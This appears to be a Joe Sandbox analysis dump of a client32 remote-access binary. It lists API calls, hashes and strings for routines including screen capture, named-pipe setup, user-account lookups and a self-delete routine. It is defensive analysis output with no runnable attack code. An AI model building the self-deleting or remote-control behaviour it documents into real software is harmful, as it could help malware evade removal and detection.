• Opcode Fuzzy Hash: 5134503a2c8da02e36f93c83ba404df5dd22f98f66039dab1883123dd78627a5
• Instruction Fuzzy Hash: B301D4353423A79BFB1A8E35CDA4B5BB79ABF827A4F01462DE815CB280D774D800C780
APIs
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: __waccess_s
• String ID:
• API String ID: 4272103461-0
• Opcode ID: ef7a6628b8ba34dfa5084db135283d76d392227949a9b5e0c08c397448921cd0
• Instruction ID: ab19ac5a5597399f8d1ca71f455f516602a279338b20f7293c175e29f7786032
• Opcode Fuzzy Hash: ef7a6628b8ba34dfa5084db135283d76d392227949a9b5e0c08c397448921cd0
• Instruction Fuzzy Hash: 00C09BB705410D7F5F155DE5EC00C557F5DD6806747149115FD1C89490DD73E961D540
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __fsopen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3646066109-0
                                                                                                                                                    • Opcode ID: 458c5a181ffae5f95d358663ef626c75276123e7ccc662156e21cb703a51c411
                                                                                                                                                    • Instruction ID: eecee5f277637f0c818c851ebfea4a610619873cfad902e7c0818376e8e04ccc
                                                                                                                                                    • Opcode Fuzzy Hash: 458c5a181ffae5f95d358663ef626c75276123e7ccc662156e21cb703a51c411
                                                                                                                                                    • Instruction Fuzzy Hash: 0CC09B7644010C77CF111946DC01E4D7F1E97D0664F444010FB1C19560A573E971D585
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 11088BE0: IsWindow.USER32(111314CC), ref: 11088BFC
                                                                                                                                                      • Part of subcall function 11088BE0: IsWindow.USER32(?), ref: 11088C16
                                                                                                                                                    • LoadCursorA.USER32(00000000,00007F02), ref: 110077EA
                                                                                                                                                    • SetCursor.USER32(00000000), ref: 110077F1
                                                                                                                                                    • GetDC.USER32(?), ref: 1100781D
                                                                                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 1100782A
                                                                                                                                                    • CreateCompatibleBitmap.GDI32(?,?,?), ref: 11007934
                                                                                                                                                    • SelectObject.GDI32(?,00000000), ref: 11007942
                                                                                                                                                    • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 11007956
                                                                                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 11007963
                                                                                                                                                    • CreateCompatibleBitmap.GDI32(?,?,?), ref: 11007975
                                                                                                                                                    • SelectClipRgn.GDI32(?,00000000), ref: 110079A1
                                                                                                                                                      • Part of subcall function 110022D0: DeleteObject.GDI32(?), ref: 110022E1
                                                                                                                                                      • Part of subcall function 110022D0: CreatePen.GDI32(?,?,?), ref: 11002308
                                                                                                                                                      • Part of subcall function 11005B70: CreateSolidBrush.GDI32(?), ref: 11005B97
                                                                                                                                                    • BitBlt.GDI32(?,00000000,00000000,?,?,?,?,?,00CC0020), ref: 110079CB
                                                                                                                                                    • SelectClipRgn.GDI32(?,00000000), ref: 110079E0
                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 110079ED
                                                                                                                                                    • DeleteDC.GDI32(?), ref: 110079FA
                                                                                                                                                    • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 11007A17
                                                                                                                                                    • ReleaseDC.USER32(?,?), ref: 11007A46
                                                                                                                                                    • CreatePen.GDI32(00000002,00000001,00000000), ref: 11007A51
                                                                                                                                                    • CreateSolidBrush.GDI32(?), ref: 11007B42
                                                                                                                                                    • GetSysColor.USER32(00000004), ref: 11007B50
                                                                                                                                                    • LoadBitmapA.USER32(00000000,00002EEF), ref: 11007B67
                                                                                                                                                      • Part of subcall function 11142F40: GetObjectA.GDI32(11003D76,00000018,?), ref: 11142F53
                                                                                                                                                      • Part of subcall function 11142F40: CreateCompatibleDC.GDI32(00000000), ref: 11142F61
                                                                                                                                                      • Part of subcall function 11142F40: CreateCompatibleDC.GDI32(00000000), ref: 11142F66
                                                                                                                                                      • Part of subcall function 11142F40: SelectObject.GDI32(00000000,00000000), ref: 11142F7E
                                                                                                                                                      • Part of subcall function 11142F40: CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 11142F91
                                                                                                                                                      • Part of subcall function 11142F40: SelectObject.GDI32(00000000,00000000), ref: 11142F9C
                                                                                                                                                      • Part of subcall function 11142F40: SetBkColor.GDI32(00000000,?), ref: 11142FA6
                                                                                                                                                      • Part of subcall function 11142F40: BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020), ref: 11142FC3
                                                                                                                                                      • Part of subcall function 11142F40: SetBkColor.GDI32(00000000,00000000), ref: 11142FCC
                                                                                                                                                      • Part of subcall function 11142F40: SetTextColor.GDI32(00000000,00FFFFFF), ref: 11142FD8
                                                                                                                                                      • Part of subcall function 11142F40: BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,008800C6), ref: 11142FF5
                                                                                                                                                      • Part of subcall function 11142F40: SetBkColor.GDI32(00000000,?), ref: 11143000
                                                                                                                                                      • Part of subcall function 11142F40: SetTextColor.GDI32(00000000,00000000), ref: 11143009
                                                                                                                                                      • Part of subcall function 11142F40: BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00EE0086), ref: 11143026
                                                                                                                                                      • Part of subcall function 11142F40: SelectObject.GDI32(00000000,00000000), ref: 11143031
                                                                                                                                                      • Part of subcall function 11110230: _malloc.LIBCMT ref: 11110239
                                                                                                                                                      • Part of subcall function 11110230: _memset.LIBCMT ref: 11110262
                                                                                                                                                    • _memset.LIBCMT ref: 11007BC7
                                                                                                                                                    • _swscanf.LIBCMT ref: 11007C34
                                                                                                                                                      • Part of subcall function 11081E00: _strrchr.LIBCMT ref: 11081E0E
                                                                                                                                                    • CreateFontIndirectA.GDI32(?), ref: 11007C65
                                                                                                                                                    • _memset.LIBCMT ref: 11007C8C
                                                                                                                                                    • GetStockObject.GDI32(00000011), ref: 11007C9F
                                                                                                                                                    • GetObjectA.GDI32(00000000), ref: 11007CA6
                                                                                                                                                    • CreateFontIndirectA.GDI32(?), ref: 11007CB3
                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 11007DF6
                                                                                                                                                    • SetWindowTextA.USER32(?,00000000), ref: 11007E33
                                                                                                                                                    • GetSystemMetrics.USER32(00000001), ref: 11007E53
                                                                                                                                                    • GetSystemMetrics.USER32(00000000), ref: 11007E70
                                                                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000001), ref: 11007EC0
                                                                                                                                                    • SelectObject.GDI32(?,00000000), ref: 11007986
                                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                      • Part of subcall function 11095990: GetSystemMetrics.USER32(0000004C), ref: 1109599E
                                                                                                                                                      • Part of subcall function 11095990: GetSystemMetrics.USER32(0000004D), ref: 110959A7
                                                                                                                                                      • Part of subcall function 11095990: GetSystemMetrics.USER32(0000004E), ref: 110959AE
                                                                                                                                                      • Part of subcall function 11095990: GetSystemMetrics.USER32(00000000), ref: 110959B7
                                                                                                                                                      • Part of subcall function 11095990: GetSystemMetrics.USER32(0000004F), ref: 110959BD
                                                                                                                                                      • Part of subcall function 11095990: GetSystemMetrics.USER32(00000001), ref: 110959C5
                                                                                                                                                    • UpdateWindow.USER32(?), ref: 11007EF2
                                                                                                                                                    • SetCursor.USER32(?), ref: 11007EFF
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Create$Object$MetricsSystem$Select$ColorCompatibleWindow$Bitmap$CursorDeleteText_memset$BrushClipFontIndirectLoadSolid$ErrorExitLastMessageProcessRectReleaseStockUpdate_malloc_strrchr_swscanfwsprintf
                                                                                                                                                    • String ID: %d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%s$Annotate$DISPLAY$FillColour$FillStyle$Font$Monitor$PenColour$PenWidth$Show$ShowAppIds$Tool$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                                    • API String ID: 2635354838-2303488826
                                                                                                                                                    • Opcode ID: ce91e015fccf874ab5364d5912c202136b1815022c7b0a0c5b798458fb00d7af
                                                                                                                                                    • Instruction ID: 6182bcd3debcd054039c16ce38c58758ae1f5640e4e16b95df98d0b4ae7a1d43
                                                                                                                                                    • Opcode Fuzzy Hash: ce91e015fccf874ab5364d5912c202136b1815022c7b0a0c5b798458fb00d7af
                                                                                                                                                    • Instruction Fuzzy Hash: 5422C7B5A00719AFE714CFA4CC85FEAF7B8FB48708F0045A9E26A97684D774A940CF50
                                                                                                                                                    APIs
                                                                                                                                                    • _memset.LIBCMT ref: 11127400
                                                                                                                                                    • _memset.LIBCMT ref: 1112741D
                                                                                                                                                    • GetVersionExA.KERNEL32(?,?,?,?,?,00000000,00000000), ref: 11127436
                                                                                                                                                    • GetTempPathA.KERNEL32(00000104,?,?,?,?,?,00000000,00000000), ref: 11127455
                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,00000000,00000000), ref: 1112749B
                                                                                                                                                    • _strrchr.LIBCMT ref: 111274AA
                                                                                                                                                    • CreateFileA.KERNEL32(?,C0000000,00000005,00000000,00000002,00000000,00000000,?,?,?,?,?,?,00000000,00000000), ref: 111274E3
                                                                                                                                                    • WriteFile.KERNEL32(00000000,111B8C68,000004D0,?,00000000,00000000,?,?,?,?,?,?,00000000,00000000), ref: 1112750F
                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,00000000,00000000), ref: 1112751C
                                                                                                                                                    • CreateFileA.KERNEL32(?,80000000,00000005,00000000,00000003,04000000,00000000,?,?,?,?,?,?,00000000,00000000), ref: 11127537
                                                                                                                                                    • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,00000000,00000000), ref: 11127547
                                                                                                                                                    • wsprintfA.USER32 ref: 11127561
                                                                                                                                                    • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 1112758D
                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 1112759E
                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 111275A7
                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 111275AA
                                                                                                                                                    • CreateProcessA.KERNEL32(00000000,explorer.exe,00000000,00000000,00000000,00000044,00000000,00000000,00000044,?,?,?,?,?,00000000,00000000), ref: 111275E0
                                                                                                                                                    • GetCurrentProcess.KERNEL32(?,?,00000000,00000000,00000000,?,?,?,?,00000000,00000000), ref: 11127682
                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,?,?,?,?,00000000,00000000), ref: 11127685
                                                                                                                                                    • DuplicateHandle.KERNEL32(00000000,?,?,?,?,00000000,00000000), ref: 11127688
                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,00000000,00000000), ref: 1112769C
                                                                                                                                                    • _strrchr.LIBCMT ref: 111276AB
                                                                                                                                                    • _memmove.LIBCMT ref: 11127724
                                                                                                                                                    • GetThreadContext.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 11127744
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                     • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                     • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                     • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                     • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                     • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                     • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                     • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                     • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                     • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                     • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                     • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                     • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                     • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FileHandleProcess$CloseCreate$Current$ModuleName_memset_strrchr$ContextDuplicatePathTempThreadVersionWrite_memmovewsprintf
                                                                                                                                                    • String ID: "%s" %d %s$*.*$D$NSelfDel.exe$explorer.exe$iCodeSize <= sizeof(local.opCodes)$pSlash$selfdelete.cpp
                                                                                                                                                    • API String ID: 2219718054-800295887
                                                                                                                                                    • Opcode ID: 358ec25b12d5316939eb5b1f22c615080bb201b40904b81bfc467a07c38be4f0
                                                                                                                                                    • Instruction ID: 6f5bf149a73cded94bd2a3d0400a9449b47971ff92e0dc1769d6f3c3ef99b26f
                                                                                                                                                    • Opcode Fuzzy Hash: 358ec25b12d5316939eb5b1f22c615080bb201b40904b81bfc467a07c38be4f0
                                                                                                                                                    • Instruction Fuzzy Hash: D8B1D4B5A40328AFE724DF60CD85FDAF7B8EB44708F008199E619A76C4DB706A84CF55
                                                                                                                                                    APIs
                                                                                                                                                    • LoadLibraryA.KERNEL32(netapi32.dll,?,?), ref: 11147195
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,NetWkstaUserGetInfo), ref: 111471C6
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,NetUserGetInfo), ref: 111471D4
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,NetApiBufferFree), ref: 111471E2
                                                                                                                                                    • GetUserNameW.ADVAPI32(?,?), ref: 11147233
                                                                                                                                                    • GetTickCount.KERNEL32 ref: 111472A0
                                                                                                                                                    • GetTickCount.KERNEL32 ref: 111472C3
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                     • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                     • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                     • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                     • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                     • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                     • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                     • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                     • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                     • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                     • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                     • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                     • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                     • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressProc$CountTick$LibraryLoadNameUser
                                                                                                                                                    • String ID: <not Available>$AccessDenied$InvalidComputer$NetApiBufferFree$NetUserGetInfo$NetUserGetInfo(%ls\%ls) took %d ms and ret x%x$NetWkstaUserGetInfo$UserNotFound$d$netapi32.dll
                                                                                                                                                    • API String ID: 132346978-2450594007
                                                                                                                                                    • Opcode ID: d766d68a65dbef05b4443dd6d9e807eb58abfdc436fa79d712fe2cbede22872e
                                                                                                                                                    • Instruction ID: 7595ca438a49fe2cfed1e9b9138c1f844f941fc746b3e2b3d1353ee5cc6e5023
                                                                                                                                                    • Opcode Fuzzy Hash: d766d68a65dbef05b4443dd6d9e807eb58abfdc436fa79d712fe2cbede22872e
                                                                                                                                                    • Instruction Fuzzy Hash: 3F917A75A012289FDB28CF64C894ADAFBB4EF49318F5581E9E94D97301DB309E80CF91
                                                                                                                                                    APIs
                                                                                                                                                    • IsIconic.USER32(?), ref: 11123836
                                                                                                                                                    • FreeLibrary.KERNEL32(?,?,?), ref: 1112387B
                                                                                                                                                    • IsIconic.USER32(?), ref: 111238C4
                                                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 11123931
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                     • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                     • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                     • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                     • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                     • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                     • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                     • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                     • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                     • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                     • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                     • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                     • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                     • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Iconic$FreeInvalidateLibraryRect
                                                                                                                                                    • String ID: KeepAspect$ScaleToFit$View$ignoring WM_TOUCH
                                                                                                                                                    • API String ID: 2857465220-3401310001
                                                                                                                                                    • Opcode ID: f2e6e33feaa6725b9faac7f171b1172a329f252e15d45d58948213b881d2ca94
                                                                                                                                                    • Instruction ID: 49527fdfa53e08aa09f3a132f4721a51d3eab46a8aa9ea1429b3fa51c4cb3807
                                                                                                                                                    • Opcode Fuzzy Hash: f2e6e33feaa6725b9faac7f171b1172a329f252e15d45d58948213b881d2ca94
                                                                                                                                                    • Instruction Fuzzy Hash: 30C12771E1870A9FEB15CF64CA81BEAF7A4FB4C714FA0052EE916872C0E775A841CB51
                                                                                                                                                    APIs
                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 110CB7D9
                                                                                                                                                    • IsIconic.USER32(00000001), ref: 110CB7E9
                                                                                                                                                    • GetClientRect.USER32(00000001,?), ref: 110CB7F8
                                                                                                                                                    • GetSystemMetrics.USER32(00000000), ref: 110CB80D
                                                                                                                                                    • GetSystemMetrics.USER32(00000001), ref: 110CB814
                                                                                                                                                    • IsIconic.USER32(00000001), ref: 110CB844
                                                                                                                                                    • GetWindowRect.USER32(00000001,?), ref: 110CB853
                                                                                                                                                    • SetWindowPos.USER32(?,00000000,?,11186ABB,00000000,00000000,0000001D,00000000,?,00000001,?,00000002,?,?), ref: 110CB907
                                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                     • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                     • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                     • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                     • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                     • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                     • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                     • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                     • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                     • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                     • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                     • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                     • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                     • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: RectWindow$IconicMetricsSystem$ClientErrorExitLastMessageProcesswsprintf
• String ID: ..\ctl32\nsmdlg.cpp$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_eh$m_hWnd
• API String ID: 2655531791-1552842965
• Opcode ID: 7316ed0ab011e425627eb5277c7b03534fcc1c44e65c4e20bf12da702932a4de
• Instruction ID: bec57f5bcccff08dda3657368f880f3a53371a65c549dad109d34ac0d6980115
• Opcode Fuzzy Hash: 7316ed0ab011e425627eb5277c7b03534fcc1c44e65c4e20bf12da702932a4de
• Instruction Fuzzy Hash: 3B51BE71E0061AAFDB10CFA5CC84FEEB7B8FB48754F1441A9E516A7280E774A905CF90
APIs
• LocalAlloc.KERNEL32(00000040,00000014,?,00000000), ref: 110F37AC
• InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 110F37D5
• SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000), ref: 110F37E2
• CreateNamedPipeA.KERNEL32(?,00000003,00000006,00000001,?,?,000003E8,?), ref: 110F3813
• GetLastError.KERNEL32 ref: 110F3820
• Sleep.KERNEL32(000003E8), ref: 110F383F
• CreateNamedPipeA.KERNEL32(?,00000003,00000006,00000001,00000001,?,000003E8,0000000C), ref: 110F385E
• LocalFree.KERNEL32(?), ref: 110F386F
  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
Strings
• CreateNamedPipe %s failed, error %d, xrefs: 110F3828
• pSD, xrefs: 110F37C5
